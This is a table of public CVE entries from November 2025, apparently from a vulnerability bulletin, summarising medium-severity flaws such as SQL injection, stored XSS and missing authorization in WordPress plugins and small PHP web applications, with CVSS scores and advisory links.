| 1000projects--Design & Development of Student Database Management System | A vulnerability was detected in 1000projects Design & Development of Student Database Management System 1.0. Affected is an unknown function of the file /TeacherLogin/Academics/SubjectDetails.php. The manipulation of the argument SubCode results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13289 | VDB-332629 | 1000projects Design & Development of Student Database Management System SubjectDetails.php sql injection VDB-332629 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691612 | 1000projects Design & Development of Student Database Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/2   |
| _luigi--The Permalinks Cascade | The Permalinks Cascade plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.2. This is due to the plugin not properly verifying that a user is authorized to perform an action in the handleTPCAdminAjaxRequest function. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized administrative actions such as enabling or disabling automatic pinging settings and modifying page exclusion settings. | 2025-11-18 | 4.3 | CVE-2025-12372 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c08d420d-d521-4215-9ef7-b5d1c44a19d3?source=cve https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/admin/admin-controller.class.php#L109 https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/includes/core.class.php#L36   |
| admintwentytwenty--UiPress lite | Effortless custom dashboards, admin themes and pages | The UiPress lite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.08. This is due to missing capability checks in the 'uip_process_block_query' AJAX function. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive user data including password hashes, emails, and other user information that could be used for account takeover attacks. | 2025-11-21 | 6.5 | CVE-2025-10938 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d8aa06eb-774a-4cd9-bd35-2d6409475696?source=cve https://wordpress.org/plugins/uipress-lite/   |
| admintwentytwenty--UiPress lite | Effortless custom dashboards, admin themes and pages | The UiPress lite | Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'uip_save_ui_template' function in all versions up to, and including, 3.5.08. This makes it possible for authenticated attackers, with Subscriber-level access and above, to save templates that contain custom JavaScript. | 2025-11-21 | 6.4 | CVE-2025-11003 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b2a01ccc-c98e-4fcc-8eaf-721ec46584fc?source=cve https://plugins.trac.wordpress.org/browser/uipress-lite/tags/3.5.08/admin/core/uiBuilder.php#L613 https://plugins.trac.wordpress.org/browser/uipress-lite/tags/3.5.08/admin/classes/PostTypes/UiTemplates.php#L416   |
| admintwentytwenty--UiPress lite | Effortless custom dashboards, admin themes and pages | The UiPress lite | Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the uip_save_site_option() function in all versions up to, and including, 3.5.08. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary plugin settings. Other AJAX actions are also affected. | 2025-11-21 | 4.3 | CVE-2025-11815 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8f8d7397-0201-4194-8604-057f905ef10b?source=cve https://plugins.trac.wordpress.org/browser/uipress-lite/trunk/admin/core/ajax-functions.php#L396 https://plugins.trac.wordpress.org/changeset/3398753/   |
| aioseo--Broken Link Checker by AIOSEO Easily Fix/Monitor Internal and External links | The Broken Link Checker by AIOSEO - Easily Fix/Monitor Internal and External links plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization in all versions up to, and including, 1.2.5. This is due to the plugin registering a REST API endpoint that only checks for a broad capability (aioseo_blc_broken_links_page) that is granted to contributor level users, without verifying the user's permission to perform actions on the specific post being targeted. This makes it possible for authenticated attackers, with contributor level access and above, to trash arbitrary posts via the DELETE /wp-json/aioseoBrokenLinkChecker/v1/post endpoint. | 2025-11-18 | 5.4 | CVE-2025-11734 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0254cd1b-f8f6-400e-a48e-81bd553fe8d1?source=cve https://plugins.trac.wordpress.org/changeset/3390304/broken-link-checker-seo   |
| alekv--Pixel Manager for WooCommerce Track Conversions and Analytics, Google Ads, TikTok and more | The Pixel Manager for WooCommerce - Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.49.2 via the ajax_pmw_get_product_ids() function due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to. | 2025-11-18 | 5.3 | CVE-2025-12545 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9babb946-4033-4e66-8f59-b73185ffcd49?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L343 https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L1235   |
| amans2k--FunnelKit Funnel Builder for WooCommerce Checkout | The FunnelKit - Funnel Builder for WooCommerce Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `wfop_phone` shortcode in all versions up to, and including, 3.13.1.2. This is due to insufficient input sanitization and output escaping on the user-supplied `default` attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-12878 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f54053e-30ff-449b-b696-92d503011a4d?source=cve https://wordpress.org/plugins/funnel-builder https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L30 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L96 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L101 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L116 https://plugins.trac.wordpress.org/changeset/3397106/funnel-builder/tags/3.13.1.3/merge-tags/class-bwf-contact-tags.php   |
| AMD--AMD EPYC 9004 Series Processors | A bug within some AMD CPUs could allow a local admin-privileged attacker to run a SEV-SNP guest using stale TLB entries, potentially resulting in loss of data integrity. | 2025-11-21 | 5.3 | CVE-2025-29934 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3029.html   |
| AMD--AMD Prof | Improper input validation within AMD uprof can allow a local attacker to overwrite MSR registers, potentially resulting in crash or denial of service. | 2025-11-21 | 5.5 | CVE-2025-48502 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html   |
| antiochinteractive--Shortcode for Google Street View | The Shortcode for Google Street View plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'streetview' shortcode in all versions up to, and including, 0.5.7. This is due to insufficient input sanitization and output escaping on the 'id' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11808 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8a5b5ce-9975-449b-bdd1-d139f1360297?source=cve https://plugins.trac.wordpress.org/browser/wp-google-street-view-shortcode/tags/0.5.7/gsv-shortcode.php#L108   |
| arkadiykilesso--Download Panel (Biggiko Team) | The Download Panel plugin for WordPress is vulnerable to unauthorized settings modification due to a missing capability check on the 'wp_ajax_save_settings' AJAX action in all versions up to, and including, 1.3.3. This is due to the absence of any capability verification in the `dlpn_save_settings()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to arbitrarily modify plugin settings including display text, download links, button colors, and other visual customizations. | 2025-11-18 | 4.3 | CVE-2025-12961 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e1a1df7e-1a57-45b3-a4b3-cb3218782ad9?source=cve https://plugins.trac.wordpress.org/browser/download-panel/tags/1.3.3/plugin.php#L50 https://plugins.trac.wordpress.org/browser/download-panel/tags/1.3.3/plugin.php#L51   |
| artibot--ArtiBot Free Chat Bot for WebSites | The ArtiBot Free Chat Bot for WebSites plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12078 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efe48adb-af9f-45dc-b693-ae56dce1bfe2?source=cve https://wordpress.org/plugins/artibot/   |
| ashraf-kabir--travel-agency | A weakness has been identified in ashraf-kabir travel-agency up to 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3. Affected is an unknown function of the file /customer_register.php. Executing manipulation can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-23 | 6.3 | CVE-2025-13544 | VDB-333311 | ashraf-kabir travel-agency customer_register.php unrestricted upload VDB-333311 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690975 | travel-agency web 1 File Upload Vulnerability https://github.com/www223-ai/CVE/blob/main/travel-File%20Upload.docx   |
| ashraf-kabir--travel-agency | A vulnerability was detected in ashraf-kabir travel-agency up to 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3. Affected by this issue is some unknown functionality of the file /results.php of the component Search. The manipulation of the argument user_query results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. | 2025-11-23 | 6.3 | CVE-2025-13546 | VDB-333313 | ashraf-kabir travel-agency Search results.php sql injection VDB-333313 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691466 | travel-agency web 1 SQL Injection vulnerability https://github.com/www223-ai/CVE/blob/main/travel-sql2.docx   |
| ashraf-kabir--travel-agency | A security vulnerability has been detected in ashraf-kabir travel-agency up to 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3. Affected by this vulnerability is an unknown functionality of the file /admin_area/index.php. The manipulation of the argument edit_pack leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-23 | 4.7 | CVE-2025-13545 | VDB-333312 | ashraf-kabir travel-agency index.php sql injection VDB-333312 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690978 | travel-agency web 1 SQL Injection Vulnerability https://github.com/www223-ai/CVE/blob/main/travel-sql.docx   |
| awensley--Project Honey Pot Spam Trap | The Project Honey Pot Spam Trap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the printAdminPage() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12406 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e774476d-3696-4489-b028-16c25f8db1ca?source=cve https://plugins.trac.wordpress.org/browser/project-honey-pot-spam-trap/tags/1.0.1/project_honey_pot.php#L244 https://plugins.trac.wordpress.org/browser/project-honey-pot-spam-trap/tags/1.0.1/project_honey_pot.php#L248 https://plugins.trac.wordpress.org/browser/project-honey-pot-spam-trap/tags/1.0.1/project_honey_pot.php#L293   |
| AWS--Wickr | Improper resource release in the call termination process in AWS Wickr before version 6.62.13 on Windows, macOS and Linux may allow a call participant to continue receiving audio input from another user after they close their call window. This issue occurs under certain conditions, which require the affected user to take a particular action within the application To mitigate this issue, users should upgrade AWS Wickr, Wickr Gov and Wickr Enterprise desktop version to version 6.62.13. | 2025-11-21 | 5.7 | CVE-2025-13524 | https://aws.amazon.com/security/security-bulletins/AWS-2025-029/ https://docs.aws.amazon.com/wickr/latest/enterpriseadminguide/clients-release-notes-6.62.html   |
| ays-pro--Quiz Maker | The Quiz Maker plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.7.0.80. This is due to the plugin exposing quiz answers through the ays_quiz_check_answer AJAX action without proper authorization checks. The endpoint only validates a nonce, but that same nonce is publicly available to all site visitors via the quiz_maker_ajax_public localized script data. This makes it possible for unauthenticated attackers to extract sensitive data including quiz answers for any quiz question. | 2025-11-19 | 5.3 | CVE-2025-12426 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc524e3e-9b7c-47ae-ab44-c327b287b81a?source=cve https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/public/class-quiz-maker-public.php#L8490 https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/includes/class-quiz-maker.php#L393 https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/public/class-quiz-maker-public.php#L179   |
| bandido--Checkbox | The Checkbox plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_ajax_nopriv_checkbox_clean_log' AJAX endpoint in all versions up to, and including, 2.8.10. This makes it possible for unauthenticated attackers to clear log files. | 2025-11-21 | 5.3 | CVE-2025-12170 | https://www.wordfence.com/threat-intel/vulnerabilities/id/16735e63-d652-4b0e-b454-2bd13368d8a7?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392710%40checkbox&new=3392710%40checkbox&sfp_email=&sfph_mail=   |
| bartboy011--Bulma Shortcodes | The Bulma Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' shortcode attribute in the bulma-notification shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11802 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e119d542-7cac-47e4-ae13-5382911f1f5e?source=cve https://plugins.trac.wordpress.org/browser/bulma-shortcodes/tags/1.0/inc/components.php#L36   |
| bdeleasa--WP Company Info | The WP Company Info plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute of the 'social-networks' shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11826 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6743a762-6d40-4ed9-95f2-f1b405683f26?source=cve https://plugins.trac.wordpress.org/browser/wp-company-info/tags/1.9.0/classes/class-wp-company-info-social-links.php#L244   |
| bdthemes--Element Pack Addons for Elementor | The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Open Street Map widget's marker content parameter in all versions up to, and including, 8.3.4. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the render function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 5.4 | CVE-2025-13196 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0da6a080-260f-4b19-a32c-453d2781389a?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3396544%40bdthemes-element-pack-lite&old=3395028%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=   |
| beycanpress--Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO | The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'createSaleRecord' function in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to manipulate presales counters. | 2025-11-21 | 5.3 | CVE-2025-11771 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c5793f-4d98-4ec1-a9b6-6e7c3f8b6099?source=cve https://plugins.trac.wordpress.org/browser/tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop/tags/2.4.6/app/RestAPI.php#L275   |
| beycanpress--Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO | The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saveDeployedContract' function in all versions up to, and including, 2.4.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the WordPress option `tokenico_deployed_contracts`, poisoning the smart contract addresses displayed. | 2025-11-21 | 4.3 | CVE-2025-11773 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e02597b1-eea6-4fdd-baeb-527201d1c61f?source=cve https://plugins.trac.wordpress.org/browser/tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop/tags/2.4.6/app/RestAPI.php#L108   |
| bhargavbhandari90--Meta Display Block | The Meta Display Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meta Display Block in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-12088 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68251e79-d064-4be4-a218-92a03e27b59d?source=cve https://wordpress.org/plugins/meta-display-block/   |
| billybigpotatoes--BrightTALK WordPress Shortcode | The BrightTALK WordPress Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'format' shortcode attribute in the brighttalk-time shortcode in all versions up to, and including, 2.4.0. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11770 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e3b5433-e17b-4ece-9e5c-ef4d818068dc?source=cve https://plugins.trac.wordpress.org/browser/brighttalk-wp-shortcode/tags/2.4.0/brighttalk-wp-shortcode.php#L130   |
| Black Duck--Black Duck SCA | Black Duck SCA versions prior to 2025.10.0 had user role permissions configured in an overly broad manner. Users with the scoped Project Manager user role with the Global User Read access permission enabled access to certain Project Administrator functionalities which should have be inaccessible. Exploitation does not grant full system control, but it may enable unauthorized changes to project configurations or access to system sensitive information. | 2025-11-21 | 5.4 | CVE-2025-0504 | https://community.blackduck.com/s/article/Black-Duck-Product-Security-Advisory-CVE-2025-0504   |
| BlackBerry--BlackBerry AtHoc (OnPrem) | An Insecure Direct Object Reference (IDOR) vulnerability in the Management Console of BlackBerry® AtHoc® (OnPrem) version 7.21 could allow an attacker to potentially gain unauthorized knowledge about other organizations hosted on the same Interactive Warning System (IWS). | 2025-11-19 | 5 | CVE-2025-12766 | https://support.blackberry.com/pkb/s/article/140929   |
| bplugins--Icon List Block Add Icon-Based Lists with Custom Styles | The Icon List Block - Add Icon-Based Lists with Custom Styles plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.1 via the fs_api_request function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Only valid JSON objects are rendered in the response. | 2025-11-18 | 6.4 | CVE-2025-12376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/438e2911-7663-44fe-883f-19ad29972aac?source=cve https://plugins.trac.wordpress.org/browser/icon-list-block/tags/1.2.0/bplugins_sdk/inc/Base/FSActivate.php#L168   |
| brainstormforce--SureForms Contact Form, Custom Form Builder, Calculator & More | The SureForms plugin for WordPress is vulnerable to Cross-Site Request Forgery Bypass in all versions up to, and including, 1.13.1. This is due to the plugin distributing generic WordPress REST API nonces (wp_rest) to unauthenticated users via the 'wp_ajax_nopriv_rest-nonce' action. While the plugin legitimately needs to support unauthenticated form submissions, it incorrectly uses generic REST nonces instead of form-specific nonces. This makes it possible for unauthenticated attackers to bypass CSRF protection on REST API endpoints that rely solely on nonce verification without additional authentication checks, allowing them to trigger unauthorized actions such as the plugin's own post-submission hooks and potentially other plugins' REST endpoints. | 2025-11-19 | 5.3 | CVE-2025-12535 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b083cf9d-bcfe-4234-a816-2d216da28b57?source=cve https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/background-process.php#L74 https://plugins.trac.wordpress.org/browser/sureforms/tags/1.13.1/inc/admin-ajax.php#L45 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3391762%40sureforms%2Ftrunk&old=3382423%40sureforms%2Ftrunk&sfp_email=&sfph_mail=   |
| Campcodes--Retro Basketball Shoes Online Store | A vulnerability was found in Campcodes Retro Basketball Shoes Online Store 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/admin_football.php. Performing manipulation of the argument product_image results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2025-11-19 | 4.7 | CVE-2025-13411 | VDB-332938 | Campcodes Retro Basketball Shoes Online Store admin_football.php unrestricted upload VDB-332938 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #693697 | campcodes Retro Basketball Shoes Online Store V1.0 Unrestricted Upload https://github.com/laosijivul/cve/issues/2 https://www.campcodes.com/   |
| Campcodes--Retro Basketball Shoes Online Store | A flaw has been found in Campcodes Retro Basketball Shoes Online Store 1.0. The impacted element is an unknown function of the file /admin/admin_product.php. Executing manipulation of the argument product_image can lead to unrestricted upload. The attack may be launched remotely. The exploit has been published and may be used. | 2025-11-19 | 4.7 | CVE-2025-13423 | VDB-332945 | Campcodes Retro Basketball Shoes Online Store admin_product.php unrestricted upload VDB-332945 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696051 | Campcodes Retro Basketball Shoes Online Store v1.0 Unrestricted Upload https://github.com/Abxery/cveee/issues/6 https://www.campcodes.com/   |
| Campcodes--School Fees Payment Management System | A vulnerability has been found in Campcodes School Fees Payment Management System 1.0. The impacted element is an unknown function of the file /ajax.php?action=save_payment. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13269 | VDB-332604 | Campcodes School Fees Payment Management System ajax.php sql injection VDB-332604 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690034 | Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/17 https://www.campcodes.com/   |
| Campcodes--School Fees Payment Management System | A vulnerability was found in Campcodes School Fees Payment Management System 1.0. This affects an unknown function of the file /ajax.php?action=save_course. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-11-17 | 6.3 | CVE-2025-13270 | VDB-332605 | Campcodes School Fees Payment Management System ajax.php sql injection VDB-332605 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690039 | Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/16 https://www.campcodes.com/   |
| Campcodes--School Fees Payment Management System | A security flaw has been discovered in Campcodes School Fees Payment Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=delete_payment. Performing manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13273 | VDB-332608 | Campcodes School Fees Payment Management System ajax.php sql injection VDB-332608 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690048 | Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/20 https://www.campcodes.com/   |
| Campcodes--School Fees Payment Management System | A weakness has been identified in Campcodes School Fees Payment Management System 1.0. Affected by this issue is some unknown functionality of the file /ajax.php?action=delete_fees. Executing manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 6.3 | CVE-2025-13274 | VDB-332609 | Campcodes School Fees Payment Management System ajax.php sql injection VDB-332609 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690886 | Campcodes School Fees Payment Management System V1.0 SQL Injection https://github.com/ASantsSec/CVE/issues/21 https://www.campcodes.com/   |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /manufacturer/edit_unit.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-11-17 | 6.3 | CVE-2025-13259 | VDB-332594 | Campcodes Supplier Management System edit_unit.php sql injection VDB-332594 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #688780 | campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber060/CVE/issues/1 https://www.campcodes.com/   |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /manufacturer/edit_product.php. Such manipulation of the argument cmbProductUnit leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13260 | VDB-332595 | Campcodes Supplier Management System edit_product.php sql injection VDB-332595 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #689268 | campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber070/CVE/issues/1 https://www.campcodes.com/   |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. This affects an unknown function of the file /admin/add_product.php. The manipulation of the argument txtProductName leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2025-11-20 | 4.7 | CVE-2025-13424 | VDB-332946 | Campcodes Supplier Management System add_product.php sql injection VDB-332946 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696053 | campcodes Supplier Management System V1.0 SQL Injection https://github.com/arpcyber070/CVE/issues/3 https://www.campcodes.com/   |
| code-projects--Courier Management System | A vulnerability was determined in code-projects Courier Management System 1.0. Affected by this issue is some unknown functionality of the file /search-edit.php. This manipulation of the argument Consignment causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-17 | 6.3 | CVE-2025-13303 | VDB-332642 | code-projects Courier Management System search-edit.php sql injection VDB-332642 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691792 | code-projects Courier Management System V1.0 SQL Injection https://github.com/labi1106/cve/issues/2 https://code-projects.org/   |
| code-projects--Courier Management System | A weakness has been identified in code-projects Courier Management System 1.0. This affects an unknown function of the file /add-office.php. This manipulation of the argument OfficeName causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-11-19 | 6.3 | CVE-2025-13396 | VDB-332924 | code-projects Courier Management System add-office.php sql injection VDB-332924 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692127 | code-projects Courier Management System V1.0 SQL Injection https://github.com/beamyou/CVE/issues/1 https://code-projects.org/   |
| code-projects--Courier Management System | A vulnerability was identified in code-projects Courier Management System 1.0. This affects an unknown part of the file /add-new-officer.php. Such manipulation of the argument ManagerName leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2025-11-17 | 4.7 | CVE-2025-13302 | VDB-332643 | code-projects Courier Management System add-new-officer.php sql injection VDB-332643 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691791 | code-projects Courier Management System V1.0 SQL Injection https://github.com/labi1106/cve/issues/1 https://code-projects.org/   |
| code-projects--Nero Social Networking Site | A vulnerability was found in code-projects Nero Social Networking Site 1.0. The affected element is an unknown function of the file /profilefriends.php. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-11-17 | 6.3 | CVE-2025-13279 | VDB-332614 | code-projects Nero Social Networking Site profilefriends.php sql injection VDB-332614 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #690963 | code-projects Nero Social Networking Site 1.0 SQL Injection https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_005 https://github.com/daojian1/Nero-Social-Networking-Site-V1.0_005/blob/main/report.md https://code-projects.org/   |
| code-projects--Simple Food Ordering System | A vulnerability has been found in code-projects Simple Food Ordering System 1.0. Affected by this issue is some unknown functionality of the file /saveorder.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13290 | VDB-332631 | code-projects Simple Food Ordering System saveorder.php sql injection VDB-332631 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691619 | code-projects Simple Food Ordering System 1.0 Unrestricted Upload https://github.com/liaoliao-hla/cve/issues/1 https://code-projects.org/   |
| code-projects--Simple Food Ordering System | A vulnerability was determined in code-projects Simple Food Ordering System 1.0. Affected by this issue is some unknown functionality of the file /listorder.php. Executing manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-23 | 6.3 | CVE-2025-13571 | VDB-333335 | code-projects Simple Food Ordering System listorder.php sql injection VDB-333335 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698495 | Code-Projects Simple Food Ordering System 1.0 SQL Injection https://github.com/jjjjj-zr/jjjjjzr/issues/1 https://code-projects.org/   |
